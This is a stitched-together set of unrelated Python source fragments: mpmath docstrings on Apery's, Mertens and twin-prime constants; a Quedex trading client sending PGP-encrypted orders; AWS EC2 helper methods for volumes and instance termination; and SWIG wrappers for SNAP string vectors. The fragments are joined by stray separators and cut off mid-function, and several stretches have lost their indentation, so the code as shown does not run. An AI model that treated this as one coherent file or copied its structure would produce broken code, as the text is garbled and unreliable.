The calculation is based on an efficient hypergeometric
series. To 50 decimal places, the value is given by::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +apery
1.2020569031595942853997381615114499907649862923405
Other ways to evaluate Apery's constant using mpmath
include::
>>> zeta(3)
1.2020569031595942853997381615114499907649862923405
>>> -psi(2,1)/2
1.2020569031595942853997381615114499907649862923405
>>> 8*nsum(lambda k: 1/(2*k+1)**3, [0,inf])/7
1.2020569031595942853997381615114499907649862923405
>>> f = lambda k: 2/k**3/(exp(2*pi*k)-1)
>>> 7*pi**3/180 - nsum(f, [1,inf])
1.2020569031595942853997381615114499907649862923405
This shows digits 9991-10000 of Apery's constant::
>>> mp.dps = 10000
>>> str(apery)[-10:]
'3189504235'
"""
mertens = r"""
Represents the Mertens or Meissel-Mertens constant, which is the
prime number analog of Euler's constant:
.. math ::
B_1 = \lim_{N\to\infty}
\left(\sum_{p_k \le N} \frac{1}{p_k} - \log \log N \right)
Here `p_k` denotes the `k`-th prime number. Other names for this
constant include the Hadamard-de la Vallee-Poussin constant or
the prime reciprocal constant.
The following gives the Mertens constant to 50 digits::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +mertens
0.2614972128476427837554268386086958590515666482612
References:
http://mathworld.wolfram.com/MertensConstant.html
"""
twinprime = r"""
Represents the twin prime constant, which is the factor `C_2`
featuring in the Hardy-Littlewood conjecture for the growth of the
twin prime counting function,
.. math ::
\pi_2(n) \sim 2 C_2 \frac{n}{\log^2 n}.
It is given by the product over primes
.. math ::
C_2 = \prod_{p\ge3} \frac{p(p-2)}{(p-1)^2} \approx 0.66016
Computing `C_2` to 50 digits::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +twinprime
0.66016181584686957392781211001455577843262336028473
References:
http://mathworld.wolfram.com/TwinPrimesConstant.html
"""
ln = r"""
Computes the natural logarithm of `x`, `\ln x`.
See :func:`~mpmath.log` for additional documentation."""
sqrt = r"""
``sqrt(x)`` gives the principal square root of `x`, `\sqrt x`.
For positive real numbers, the principal root is simply the
positive square root. For arbitrary complex numbers, the principal
square root is defined to satisfy `\sqrt x = \exp(\log(x)/2)`.
The function thus has a branch cut along the negative half real axis.
For all mpmath numbers ``x``, calling ``sqrt(x)`` is equivalent to
performing ``x**0.5``.
**Examples**
Basic examples and limits::
>>> from mpmath import *
>>> mp.dps = 15; mp.pretty = True
>>> sqrt(10)
3.16227766016838
>>> sqrt(100)
| |
<filename>quedex_api/user_stream.py
import json
import pgpy
class UserStreamListener(object):
    """Callback interface for events arriving on the Quedex user stream.

    Implement only the methods you care about; every default implementation
    is a no-op.
    """

    def on_ready(self):
        """
        Called when UserStream is ready to start receiving messages and sending commands. Immediately
        after this method is called you will receive a "welcome pack" of messages to this listener which
        will consist of order_placed messages for every pending order, open_position for every open
        position and an initial account_state (see on_order_placed, on_open_position, on_account_state
        methods, respectively).
        """
        pass

    def on_message(self, message):
        """
        Called on every received message.
        """
        pass

    def on_account_state(self, account_state):
        """
        :param account_state: a dict of the following format:
          {
            "type": "account_state",
            "balance": "<decimal as string>",
            "free_balance": "<decimal as string>",
            "total_initial_margin": "<decimal as string>",
            "total_maintenance_margin": "<decimal as string>",
            "total_unsettled_pnl": "<decimal as string>",
            "total_locked_for_orders": "<decimal as string>",
            "total_pending_withdrawal": "<decimal as string>",
            "account_status": "active"/"margin_call"/"liquidation",
          }
        """
        pass

    def on_open_position(self, open_position):
        """
        :param open_position: a dict of the following format:
          {
            "type": "open_position",
            "instrument_id": "<string id of the instrument>",
            "pnl": "<decimal as string>", // futures only
            "maintenance_margin": "<decimal as string>",
            "initial_margin": "<decimal as string>",
            "side": "long"/"short",
            "quantity": <integer>,
            "average_opening_price": "<decimal as string>",
          }
        """
        pass

    def on_order_placed(self, order_placed):
        """
        :param order_placed: a dict of the following format:
          {
            "type": "order_placed",
            "client_order_id": "<string id>",
            "instrument_id": "<string id of the instrument>",
            "limit_price": "<decimal as string>",
            "side": "buy"/"sell",
            "quantity": <integer>,
          }
        """
        pass

    def on_order_place_failed(self, order_place_failed):
        """
        :param order_place_failed: a dict of the following format:
          {
            "client_order_id": "<string id>",
          }
        """
        pass

    def on_order_cancelled(self, order_cancelled):
        """
        :param order_cancelled: a dict of the following format:
          {
            "client_order_id": "<string id>",
          }
        """
        pass

    def on_order_forcefully_cancelled(self, order_forcefully_cancelled):
        """
        :param order_forcefully_cancelled: a dict of the following format:
          {
            "client_order_id": "<string id>",
            "cause": "liquidation"/"settlement",
          }
        """
        pass

    def on_order_cancel_failed(self, order_cancel_failed):
        """
        :param order_cancel_failed: a dict of the following format:
          {
            "client_order_id": "<string id>",
          }
        """
        pass

    def on_all_orders_cancelled(self, all_orders_cancelled):
        """
        :param all_orders_cancelled: dummy parameter, reserved for future extensions
        """
        pass

    def on_cancel_all_orders_failed(self, cancel_all_orders_failed):
        """
        :param cancel_all_orders_failed: a dict of the following format:
          {
            "cause": "session_not_active",
          }
        """
        pass

    def on_order_modified(self, order_modified):
        """
        :param order_modified: a dict of the following format:
          {
            "client_order_id": "<string id>",
          }
        """
        pass

    def on_order_modification_failed(self, order_modification_failed):
        """
        :param order_modification_failed: a dict of the following format:
          {
            "client_order_id": "<string id>",
          }
        """
        pass

    def on_order_filled(self, order_filled):
        """
        :param order_filled: a dict of the following format:
          {
            "client_order_id": "<string id>",
            "trade_price": "<decimal as string>",
            "trade_quantity": <integer>,
            "leaves_order_quantity": <integer>,
          }
        """
        pass

    def on_error(self, error):
        """
        Called when an error with the user stream occurs (data parsing, signature verification, websocket
        error). This means a serious problem, which should be investigated (cf. on_disconnect).
        :type error: subtype of Exception
        """
        pass

    def on_disconnect(self, message):
        """
        Called when the user stream disconnects cleanly (exchange going down for maintenance, network
        problem, etc.). The client should reconnect in such a case.
        :param message: string message with reason of the disconnect
        """
        pass
class UserStream(object):
    """
    Use this class to connect to the user stream at Quedex, i.e. to the stream of private, realtime
    data for your account with order confirmations, funds updates, etc.; the stream also
    allows sending commands to the exchange such as placing, cancelling orders, etc. The data is
    exchanged in the form of PGP-encrypted JSON messages - all parsing, decryption/encryption and
    verification/signing is handled internally and the client receives and sends Python objects (dicts
    with data).
    To use this class, implement your own UserStreamListener (you may inherit from the base class,
    but that's not necessary) and add an instance via add_listener method. Methods of listener will
    be called when respective objects arrive on the market stream. For the format of the data see
    comments on UserStreamListener. To send commands to the exchange call respective methods of this
    class - see their comments for the format of the data.
    """

    def __init__(self, exchange, trader, nonce_group=5):
        """
        :param nonce_group: value between 0 and 9, has to be different for every WebSocket connection
                            opened to the exchange (e.g. browser and trading bot); our webapp uses
                            nonce_group=0
        """
        super(UserStream, self).__init__()
        # send_message is injected externally (e.g. by the websocket layer) before use
        self.send_message = None
        self.user_stream_url = exchange.user_stream_url
        self._exchange = exchange
        self._trader = trader
        self._listeners = []
        self._nonce_group = nonce_group
        self._nonce = None
        self._initialized = False
        self._batching = False
        self._batch = None

    def add_listener(self, listener):
        """Registers a listener to be notified of user stream events."""
        self._listeners.append(listener)

    def remove_listener(self, listener):
        """Unregisters a previously added listener."""
        self._listeners.remove(listener)

    def place_order(self, place_order_command):
        """
        :param place_order_command: a dict of the following format:
          {
            "client_order_id": <positive integer id unique among orders>,
            "instrument_id": "<string id of the instrument>",
            "order_type": "limit",
            "limit_price": "<decimal as string>",
            "side": "buy"/"sell",
            "quantity": <integer>,
          }
        """
        self._check_if_initialized()
        place_order_command['type'] = 'place_order'
        check_place_order(place_order_command)
        self._set_nonce_account_id(place_order_command)
        if self._batching:
            self._batch.append(place_order_command)
        else:
            self._encrypt_send(place_order_command)

    def cancel_order(self, cancel_order_command):
        """
        :param cancel_order_command: a dict of the following format:
          {
            "client_order_id": <positive integer id of the order to cancel>,
          }
        """
        self._check_if_initialized()
        check_cancel_order(cancel_order_command)
        cancel_order_command['type'] = 'cancel_order'
        self._set_nonce_account_id(cancel_order_command)
        if self._batching:
            self._batch.append(cancel_order_command)
        else:
            self._encrypt_send(cancel_order_command)

    def cancel_all_orders(self):
        """Cancels every pending order of this account."""
        self._check_if_initialized()
        cancel_all_orders_command = {'type': 'cancel_all_orders'}
        self._set_nonce_account_id(cancel_all_orders_command)
        if self._batching:
            self._batch.append(cancel_all_orders_command)
        else:
            self._encrypt_send(cancel_all_orders_command)

    def modify_order(self, modify_order_command):
        """
        :param modify_order_command: a dict of the following format:
          {
            "client_order_id": <positive integer id of the order to modify>,
            "new_limit_price": "<decimal as string>",
            "new_quantity": <integer>,
          }
        """
        self._check_if_initialized()
        check_modify_order(modify_order_command)
        modify_order_command['type'] = 'modify_order'
        self._set_nonce_account_id(modify_order_command)
        if self._batching:
            self._batch.append(modify_order_command)
        else:
            self._encrypt_send(modify_order_command)

    def batch(self, order_commands):
        """
        Sends a list of commands as a single batch.

        :param order_commands: a list of commands of types "place_order", "cancel_order",
            "modify_order" and "cancel_all_orders"; for the format of the individual commands
            see the respective methods of this class.
        :raises ValueError: when a command of an unsupported type is encountered
        """
        self._check_if_initialized()
        for command in order_commands:
            # renamed local from `type` to avoid shadowing the builtin
            command_type = command['type']
            if command_type == 'place_order':
                check_place_order(command)
            elif command_type == 'cancel_order':
                check_cancel_order(command)
            elif command_type == 'modify_order':
                check_modify_order(command)
            elif command_type == 'cancel_all_orders':
                check_cancel_all_orders(command)
            else:
                raise ValueError('Unsupported command type: ' + command_type)
            self._set_nonce_account_id(command)
        self._send_batch_no_checks(order_commands)

    def start_batch(self):
        """
        After this method is called all calls to place_order, cancel_order, modify_order result in
        caching of the commands which are then sent once send_batch is called.
        """
        self._batch = []
        self._batching = True

    def send_batch(self):
        """
        Sends batch created from calling place_order, cancel_order, modify_order after calling
        start_batch.
        """
        if not self._batching:
            raise Exception('send_batch called without calling start_batch first')
        self._send_batch_no_checks(self._batch)
        self._batch = None
        self._batching = False

    def _send_batch_no_checks(self, order_commands):
        """Wraps already-validated commands in a batch envelope and sends them."""
        self._encrypt_send({
            'type': 'batch',
            'account_id': self._trader.account_id,
            'batch': order_commands,
        })

    def initialize(self):
        """Requests the last used nonce from the exchange; on_ready fires once subscribed."""
        self._encrypt_send({
            'type': 'get_last_nonce',
            'nonce_group': self._nonce_group,
            'account_id': self._trader.account_id,
        })

    def on_message(self, message_wrapper_str):
        """Entry point for raw WebSocket messages; dispatches by wrapper type."""
        try:
            message_wrapper = json.loads(message_wrapper_str)
            message_type = message_wrapper['type']
            if message_type == 'keepalive':
                return
            elif message_type == 'error':
                self.process_error(message_wrapper)
            elif message_type == 'data':
                self.process_data(message_wrapper)
            else:
                # no-op
                return
        except Exception as e:
            self.on_error(e)

    def process_error(self, message_wrapper):
        """Forwards non-maintenance stream errors to listeners."""
        # error_code == maintenance accompanies exchange engine going down for maintenance which
        # causes graceful disconnect of the WebSocket, handled by MarketStreamListener.on_disconnect
        if message_wrapper['error_code'] != 'maintenance':
            self.on_error(Exception('WebSocket error: ' + message_wrapper['error_code']))

    def process_data(self, message_wrapper):
        """Decrypts a data wrapper and dispatches the contained entities to listeners."""
        for entity in self._decrypt(message_wrapper['data']):
            if entity['type'] == 'last_nonce' and entity['nonce_group'] == self._nonce_group:
                self._nonce = entity['last_nonce']
                self._encrypt_send(self._set_nonce_account_id({'type': 'subscribe'}))
                return
            elif entity['type'] == 'subscribed' and entity['message_nonce_group'] == self._nonce_group:
                self._initialized = True
                self._call_listeners('on_ready')
                continue
            self._call_listeners('on_message', entity)
            self._call_listeners('on_' + entity['type'], entity)

    def on_error(self, error):
        """Forwards an exception to all listeners."""
        self._call_listeners('on_error', error)

    def on_disconnect(self, message):
        """Forwards a clean-disconnect notification to all listeners."""
        self._call_listeners('on_disconnect', message)

    def _set_nonce_account_id(self, entity):
        """Stamps the entity with the next nonce, the nonce group and the account id."""
        self._nonce += 1
        entity['nonce'] = self._nonce
        entity['nonce_group'] = self._nonce_group
        entity['account_id'] = self._trader.account_id
        return entity

    def _encrypt_send(self, entity):
        """Signs with the trader's key, encrypts to the exchange's key and sends."""
        message = pgpy.PGPMessage.new(json.dumps(entity))
        message |= self._trader.private_key.sign(message)
        # explicit encode for Python 3 compatibility
        self.send_message(str(self._exchange.public_key.encrypt(message)).encode('utf8'))

    def _decrypt(self, encrypted_str):
        """Decrypts a PGP blob, verifies the exchange's signature and parses the JSON payload."""
        # from_blob is a classmethod - no throwaway instance needed
        encrypted = pgpy.PGPMessage.from_blob(encrypted_str)
        decrypted = self._trader.private_key.decrypt(encrypted)
        if not self._exchange.public_key.verify(decrypted):
            # fix: concatenating the PGPMessage object itself raised TypeError,
            # masking the verification failure
            raise AssertionError('Verification failed for message: ' + str(decrypted.message))
        return json.loads(decrypted.message)

    def _call_listeners(self, method_name, *args, **kwargs):
        """Invokes method_name on every listener that implements it."""
        for listener in self._listeners:
            if hasattr(listener, method_name):
                getattr(listener, method_name)(*args, **kwargs)

    def _check_if_initialized(self):
        """Raises unless the subscribe handshake has completed."""
        if not self._initialized:
            raise Exception('UserStream not initialized, wait until UserStreamListener.on_ready is called.')
def check_place_order(place_order):
    """Validates a place_order command, raising ValueError on the first bad field."""
    check_positive_int(place_order, 'client_order_id')
    check_positive_decimal(place_order, 'limit_price')
    check_positive_int(place_order, 'quantity')
    check_positive_int(place_order, 'instrument_id')
    requested_side = place_order['side']
    if requested_side.lower() not in ('buy', 'sell'):
        raise ValueError('side has to be either "buy" or "sell", got: %s' % requested_side)
    requested_type = place_order['order_type']
    if requested_type.lower() != 'limit':
        raise ValueError('The only supported order_type is limit currently')
def check_cancel_order(cancel_order):
    """Validates a cancel_order command: client_order_id must be a positive integer."""
    check_positive_int(cancel_order, 'client_order_id')
def check_modify_order(modify_order):
check_positive_int(modify_order, 'client_order_id')
if 'new_limit_price' in modify_order:
check_positive_decimal(modify_order, 'new_limit_price')
if 'new_quantity' in modify_order:
check_positive_int(modify_order, 'new_quantity')
if 'new_limit_price' not | |
{}".format(instance_name, region))
instance_type = cls.get_instance_type(instance_name, boto_config)
global_availability_zone = boto_config.get('availability_zone', None)
local_availability_zone = instance_config.get('availability_zone', None)
availability_zone = local_availability_zone if local_availability_zone else global_availability_zone
omit_kargs = boto_config.copy()
if 'security_groups' in omit_kargs:
del omit_kargs['security_groups']
if 'instance_type' in omit_kargs:
del omit_kargs['instance_type']
if "availability_zone" in omit_kargs:
del omit_kargs["availability_zone"]
instance_infos = cls.create_instances(key_name, max_count, image_id, instance_type, security_groups,
instance_tag_specifigations, availability_zone, region=region, **omit_kargs)
if instance_infos is None:
raise Exception("Failed to create instance: {}".format(instance_name))
# create volumes in same zone
instance_ids = list(instance_infos.keys())
instance_statuses = cls.wait_for_instances(instance_ids)
volume_names = instance_config.get('volumes', [])
volume_results = {}
if len(volume_names) > 0:
# create the volume
cls.LOGGER.info("Attaching {} volumes for '{}' in {}".format(len(volume_names), instance_name, region))
volume_results = cls.attach_instances_to_volumes(instance_name, instance_statuses, volume_names, boto_config)
return instance_infos, volume_results
@classmethod
def attach_instances_to_volumes(cls, instance_name, instance_statuses, volume_names, boto_config):
    """Create the configured volumes for each instance and attach them.

    :param instance_name: logical name of the instance group (used for config lookup and logs)
    :param instance_statuses: {instance_id: status} of the instances to attach to
    :param volume_names: names of the volume configs to create for every instance
    :param boto_config: configuration dict forwarded to the boto helpers
    :returns: {volume_name: {instance_id: result dict}} describing each created volume
    :raises Exception: when a volume or device config is missing
    """
    availability_zones = cls.get_instances_zone(instance_ids=list(instance_statuses.keys()), **boto_config)
    volume_configs = cls.get_volume_descriptions(boto_config)
    device_configs = {k['volume']: k for k in cls.get_volume_device_descriptions(instance_name, volume_names, boto_config)}
    volume_results = {}
    for name in volume_names:
        volume_config = volume_configs.get(name, None)
        device_config = device_configs.get(name, {})
        volume_results[name] = {}
        if not volume_config or not device_config:
            # fix: was '",format(...)"' (comma instead of dot) which raised a
            # two-argument Exception instead of formatting the message
            raise Exception("Attempting to create a volume ({}) for {}, but the device or volume configs are missing".format(name, instance_name))
        device_name = device_config['device']
        snapshotid = volume_config.get('snapshotid', None)
        volumetype = volume_config.get('volumetype', 'standard')
        multiattach = volume_config.get('multiattachenabled', False)
        encrypted = volume_config.get('encrypted', False)
        tags = volume_config.get('tag_specs', [])
        tag_specifications = cls.get_tag_specs_configs(boto_config, tag_specs_names=tags, resource_type='volume')
        # fix: size was fetched twice; the effective default was 100, kept here
        size = volume_config.get('size', 100)
        vids = []
        for instance_id in instance_statuses:
            availability_zone = availability_zones[instance_id]
            # fix: the log previously printed instance_name twice instead of name:id
            cls.LOGGER.debug("Creating volume {} ({}:{}G) for '{}:{}' in {}".format(
                name, volumetype, size, instance_name, instance_id, availability_zone))
            vid = cls.create_volume(availability_zone=availability_zone, snapshotid=snapshotid,
                                    volumetype=volumetype, multiattach=multiattach, encrypted=encrypted,
                                    tags=tag_specifications, size=size, **boto_config)
            volume_results[name][instance_id] = {'volume_id': vid,
                                                 'volume_name': name,
                                                 'instance_name': instance_name,
                                                 'device': device_name,
                                                 'attached': False,
                                                 'response': None}
            # use this to capture arguments and attach each volume once they
            # are all available
            vids.append([vid, (instance_id, vid, device_name)])
        # wait for all the volumes to be available before attaching them
        _ = cls.wait_for_volumes([v[0] for v in vids], **boto_config)
        for vid, attach_args in vids:
            if vid:
                rsp = cls.attach_volume(*attach_args, **boto_config)
                # fix: results were previously recorded under the stale `instance_id`
                # left over from the creation loop (always the last instance)
                attached_instance_id = attach_args[0]
                volume_results[name][attached_instance_id]['response'] = rsp
                volume_results[name][attached_instance_id]['attached'] = True
    return volume_results
@classmethod
def get_availability_zones(cls, **kargs):
    """Return the names of all availability zones whose state is 'available'."""
    client = cls.get_ec2(**kargs)
    described = client.describe_availability_zones()['AvailabilityZones']
    available = []
    for zone in described:
        if zone['State'].lower() == 'available':
            available.append(zone['ZoneName'])
    return available
@classmethod
def attach_volume(cls, instance_id, volume_id, device_name, **kargs):
    """Attach volume_id to instance_id as device_name; returns the AttachVolume response."""
    ec2 = cls.get_ec2(**kargs)
    # fix: the log previously swapped volume_id and instance_id
    cls.LOGGER.info("Attaching volume ({}) to '{}' as {}".format(volume_id, instance_id, device_name))
    rsp = ec2.attach_volume(InstanceId=instance_id, VolumeId=volume_id, Device=device_name)
    return rsp
@classmethod
def get_volumes(cls, volume_ids=None, volume_id=None, **kargs):
    """Describe volumes and return {VolumeId: volume info}.

    :param volume_ids: optional list of volume ids to restrict to
    :param volume_id: optional single volume id (added to volume_ids)
    :returns: {} when nothing matches
    """
    # fix: copy so the caller's list is not mutated when volume_id is appended
    volume_ids = list(volume_ids) if volume_ids is not None else []
    if volume_id is not None:
        volume_ids.append(volume_id)
    ec2 = cls.get_ec2(**kargs)
    if len(volume_ids) == 0:
        rsp = ec2.describe_volumes()
    else:
        rsp = ec2.describe_volumes(VolumeIds=volume_ids)
    # an empty comprehension yields {}, matching the previous explicit fallback
    return {k["VolumeId"]: k for k in rsp["Volumes"]}
@classmethod
def find_attached_volumes(cls, volume_id=None, volume_ids=None, ignore_device_names=('/dev/sda1',), **kargs):
    """Return {volume_id: info} for volumes that have at least one attachment.

    Volumes attached under any device name in ignore_device_names (e.g. root
    disks) are excluded; pass None to exclude nothing.
    """
    # fix: kargs (region/credentials) were previously dropped here
    volume_infos = cls.get_volumes(volume_id=volume_id, volume_ids=volume_ids, **kargs)
    if ignore_device_names is None:
        ignore_device_names = []
    attached = {}
    for vid, info in volume_infos.items():
        attachments = info.get('Attachments', [])
        if not attachments:
            continue
        device_names = [a.get('Device', None) for a in attachments]
        if any(d is not None and d in ignore_device_names for d in device_names):
            continue
        attached[vid] = info
    return attached
@classmethod
def detach_volumes(cls, volume_id=None, volume_ids=None, volume_target_tags=None, ignore_device_names=('/dev/sda1',), **kargs):
    """Detach every attached volume matching the arguments and wait for detachment.

    :param volume_target_tags: optional dict of tags to further filter the volumes
    :returns: {volume_id: info} of the volumes that were considered for detaching
    """
    # fix: kargs (region/credentials) were previously dropped here
    volume_infos = cls.find_attached_volumes(volume_id=volume_id, volume_ids=volume_ids,
                                             ignore_device_names=ignore_device_names, **kargs)
    if isinstance(volume_target_tags, dict):
        volume_infos = cls.find_relevant_volumes(volume_infos=volume_infos,
                                                 target_tags=volume_target_tags, **kargs)
    ec2 = cls.get_ec2(**kargs)
    cls.LOGGER.info("Detaching {} volumes".format(len(volume_infos)))
    detached_volumes = []
    for vid in volume_infos:
        try:
            cls.LOGGER.debug("Detaching {}".format(vid))
            ec2.detach_volume(VolumeId=vid)
            detached_volumes.append(vid)
        # fix: was a bare except, which also swallowed KeyboardInterrupt/SystemExit
        except Exception:
            cls.LOGGER.error("Failed to detach {}:\n{}".format(vid, traceback.format_exc()))
    cls.LOGGER.info("Waiting for {} detached volumes".format(len(detached_volumes)))
    # fix: kargs were previously dropped here as well
    cls.wait_for_volumes(volume_ids=detached_volumes, **kargs)
    return volume_infos
@classmethod
def create_volume(cls, availability_zone=None, snapshotid=None, volumetype="gp2", multiattach=False,
                  encrypted=False, tags=None, size=None, **kargs):
    """Create an EBS volume and return its VolumeId (None on an unexpected response).

    :param availability_zone: zone to create in; when None the first available zone is used
    :param snapshotid: optional snapshot to create the volume from
    :param volumetype: EBS volume type (e.g. "gp2", "standard")
    :param multiattach: whether to enable multi-attach
    :param encrypted: whether to encrypt the volume
    :param tags: TagSpecifications list for the new volume
    :param size: size in GiB (optional when created from a snapshot)
    :raises Exception: when no availability zone can be determined
    """
    ec2 = cls.get_ec2(**kargs)
    if availability_zone is None:
        # grab the first available zone
        # NOTE(review): assumes get_ec2 accepts/returns an existing client via
        # the `ec2` kwarg - confirm against get_ec2's implementation
        az = cls.get_availability_zones(ec2=ec2)
        if len(az) == 0:
            raise Exception("Unable to get an AvailabilityZone")
        availability_zone = az[0]
    _kargs = {"AvailabilityZone": availability_zone,
              "VolumeType": volumetype, "MultiAttachEnabled": multiattach,
              "Encrypted": encrypted}
    if tags:
        _kargs["TagSpecifications"] = tags
    if snapshotid:
        _kargs["SnapshotId"] = snapshotid
    if size:
        _kargs["Size"] = size
    if snapshotid:
        cls.LOGGER.info("Creating volume ({}:{}) using {} in {}".format(volumetype, size, snapshotid, availability_zone))
    else:
        # fix: message previously ended with a dangling " for"
        cls.LOGGER.info("Creating volume ({}:{}) in {}".format(volumetype, size, availability_zone))
    rsp = ec2.create_volume(**_kargs)
    return rsp.get('VolumeId', None)
@classmethod
def check_for_instances_up(cls, instances, **kargs):
    """Return the subset of `instances` that are running (state code 16) with
    both instance and system status reported as 'ok'."""
    ec2 = cls.get_ec2(**kargs)
    statuses = ec2.describe_instance_status(InstanceIds=instances)
    ready = []
    for status in statuses['InstanceStatuses']:
        running = status['InstanceState']['Code'] == 16
        instance_ok = status['InstanceStatus']['Status'] == 'ok'
        system_ok = status['SystemStatus']['Status'] == 'ok'
        if running and instance_ok and system_ok:
            ready.append(status['InstanceId'])
    return ready
@classmethod
def extract_public_ips(cls, instance_infos):
    """Map each InstanceId to its PublicIpAddress ('' when the instance has none)."""
    instance_to_ip = {}
    for info in instance_infos:
        instance_to_ip[info['InstanceId']] = info.get('PublicIpAddress', '')
    return instance_to_ip
@classmethod
def get_instances_zone(cls, instance_ids=None, **kargs):
instance_infos = cls.get_instance_infos(instance_ids=instance_ids, **kargs)
ii_az = {}
for x in instance_infos:
az = x['Placement']['AvailabilityZone']
ii_az[x['InstanceId']] = az
return ii_az
@classmethod
def get_instance_infos_zone(cls, instance_infos=None, **kargs):
if instance_infos is None:
instance_infos = cls.get_instance_infos(**kargs)
ii_az = {}
for x in instance_infos:
az = x['Placement']['AvailabilityZone']
ii_az[x['InstanceId']] = az
return ii_az
@classmethod
def get_instance_infos(cls, instance_ids=None, **kargs):
instance_infos = []
ec2 = cls.get_ec2(**kargs)
results = None
if instance_ids is None or len(instance_ids) == 0:
results = ec2.describe_instances()
else:
results = ec2.describe_instances(InstanceIds=instance_ids)
if results is None:
return None
for k in results['Reservations']:
instance_infos = instance_infos + k['Instances']
return instance_infos
@classmethod
def get_instance_public_ips(cls, instance_ids, **kargs):
instance_infos = cls.get_instance_infos(instance_ids, **kargs)
return cls.extract_public_ips(instance_infos)
@classmethod
def find_relevant_instances(cls, target_tags: dict=None, **kargs):
target_tags = target_tags if target_tags else {}
relevant_instances = {}
instance_infos = cls.get_instance_infos()
for instance in instance_infos:
tags = instance.get('Tags', None)
instance_id = instance['InstanceId']
public_ip = instance.get('PublicIpAddress', '')
if tags is None:
continue
d_tags = {tag.get('Key', ''):tag.get('Value', '') for tag in tags }
matching = {k:v for k, v in target_tags.items() if k in d_tags and v == d_tags[k]}
if len(matching) == len(target_tags):
matching['public_ip'] = public_ip
relevant_instances[instance_id] = matching
return relevant_instances
@classmethod
def find_relevant_volumes(cls, target_tags: dict=None, volume_infos=None, **kargs):
target_tags = target_tags if target_tags else {}
relevant_volumes = {}
volume_infos = cls.get_volumes() if volume_infos is None else volume_infos
for vid, vinfo in volume_infos.items():
tags = vinfo.get('Tags', None)
volume_id = vinfo['VolumeId']
if tags is None:
continue
d_tags = {tag.get('Key', ''):tag.get('Value', '') for tag in tags }
matching = {k:v for k, v in target_tags.items() if k in d_tags and v == d_tags[k]}
if len(matching) == len(target_tags):
relevant_volumes[volume_id] = matching
return relevant_volumes
@classmethod
def get_instances(cls, instance_id=None, instance_ids=None, target_tags=None, **kargs):
ec2 = cls.get_ec2(**kargs)
if instance_ids is None:
instance_ids = []
if instance_id is not None and instance_id not in instance_ids:
instance_ids.append(instance_id)
instances = {}
instance_infos = cls.get_instance_infos(instance_ids=instance_ids, **kargs)
instances = {k['InstanceId']: k for k in instance_infos }
if target_tags:
if not 'ec2' in kargs:
kargs['ec2'] = ec2
x = cls.find_relevant_instances(target_tags=target_tags, **kargs)
if len(x) > 0:
r = ec2.describe_instances(InstanceIds=[i for i in x])
instance_infos = []
for k in r['Reservations']:
instance_infos = instance_infos + k['Instances']
instances.update({k['InstanceId']: k for k in instance_infos })
return instances
@classmethod
def find_relevant_instances_multiple_regions(cls, target_tags: dict=None, regions=REGIONS, **kargs):
target_tags = target_tags if target_tags else {}
relevant_instances = []
for region in regions:
kargs['region'] = region
cls.set_region(region)
instances = cls.find_relevant_instances(target_tags=target_tags, **kargs)
relevant_instances.append({'region': region, 'instances': instances})
return relevant_instances
@classmethod
def find_relevant_volumes_multiple_regions(cls, target_tags: dict=None, regions=REGIONS, **kargs):
target_tags = target_tags if target_tags else {}
relevant_instances = []
for region in regions:
kargs['region'] = region
cls.set_region(region)
volumes = cls.find_relevant_volumes(target_tags=target_tags, **kargs)
relevant_instances.append({'region': region, 'volumes': volumes})
return relevant_instances
@classmethod
def terminate_relevant_instances(cls, instance_ids=None, instance_id=None, target_tags: dict=None, dry_run=True, **kargs):
if instance_ids is None:
instance_ids = []
if instance_id not in instance_ids:
instance_ids.append(instance_id)
if len(instance_ids) == 0 and (target_tags is None or len(target_tags) == 0):
cls.LOGGER.critical("WARNING: Must provide tags to filter out instances, or this will destroy the environment")
raise Exception("Must provide tags to filter out instances, or this will destroy the environment")
instances = cls.get_instances(instance_ids=instance_id, target_tags=target_tags, **kargs)
if len(instances) == 0 and len(instance_ids) == 0:
return instances
ec2 = cls.get_ec2(**kargs)
instance_ids = [i for i in instances]
try:
cls.LOGGER.debug("Attempting to terminate {} instances.".format(len(instance_ids)))
ec2.terminate_instances(DryRun=dry_run, InstanceIds=instance_ids)
cls.LOGGER.info("Terminated {} instances.".format(len(instance_ids)))
except KeyboardInterrupt:
cls.LOGGER.error("Failed to terminate {} instances.".format(len(instance_ids)))
except:
cls.LOGGER.error("{}".format(traceback.format_exc()))
return instances
@classmethod
def delete_relevant_volumes(cls, target_tags: dict=None, dry_run=True, **kargs):
if target_tags is None or len(target_tags) == 0:
cls.LOGGER.critical("WARNING: Must provide tags to filter out instances, or this | |
"""
PrevPerm(TStrV self) -> bool
Parameters:
self: TVec< TStr,int > *
"""
return _snap.TStrV_PrevPerm(self)
def GetPivotValN(self, *args):
"""
GetPivotValN(TStrV self, int const & LValN, int const & RValN) -> int
Parameters:
LValN: int const &
RValN: int const &
"""
return _snap.TStrV_GetPivotValN(self, *args)
def BSort(self, *args):
"""
BSort(TStrV self, int const & MnLValN, int const & MxRValN, bool const & Asc)
Parameters:
MnLValN: int const &
MxRValN: int const &
Asc: bool const &
"""
return _snap.TStrV_BSort(self, *args)
def ISort(self, *args):
"""
ISort(TStrV self, int const & MnLValN, int const & MxRValN, bool const & Asc)
Parameters:
MnLValN: int const &
MxRValN: int const &
Asc: bool const &
"""
return _snap.TStrV_ISort(self, *args)
def Partition(self, *args):
"""
Partition(TStrV self, int const & MnLValN, int const & MxRValN, bool const & Asc) -> int
Parameters:
MnLValN: int const &
MxRValN: int const &
Asc: bool const &
"""
return _snap.TStrV_Partition(self, *args)
def QSort(self, *args):
"""
QSort(TStrV self, int const & MnLValN, int const & MxRValN, bool const & Asc)
Parameters:
MnLValN: int const &
MxRValN: int const &
Asc: bool const &
"""
return _snap.TStrV_QSort(self, *args)
def Sort(self, Asc=True):
"""
Sort(TStrV self, bool const & Asc=True)
Parameters:
Asc: bool const &
Sort(TStrV self)
Parameters:
self: TVec< TStr,int > *
"""
return _snap.TStrV_Sort(self, Asc)
def IsSorted(self, Asc=True):
"""
IsSorted(TStrV self, bool const & Asc=True) -> bool
Parameters:
Asc: bool const &
IsSorted(TStrV self) -> bool
Parameters:
self: TVec< TStr,int > const *
"""
return _snap.TStrV_IsSorted(self, Asc)
def Shuffle(self, *args):
"""
Shuffle(TStrV self, TRnd Rnd)
Parameters:
Rnd: TRnd &
"""
return _snap.TStrV_Shuffle(self, *args)
def Reverse(self, *args):
"""
Reverse(TStrV self)
Reverse(TStrV self, int LValN, int RValN)
Parameters:
LValN: int
RValN: int
"""
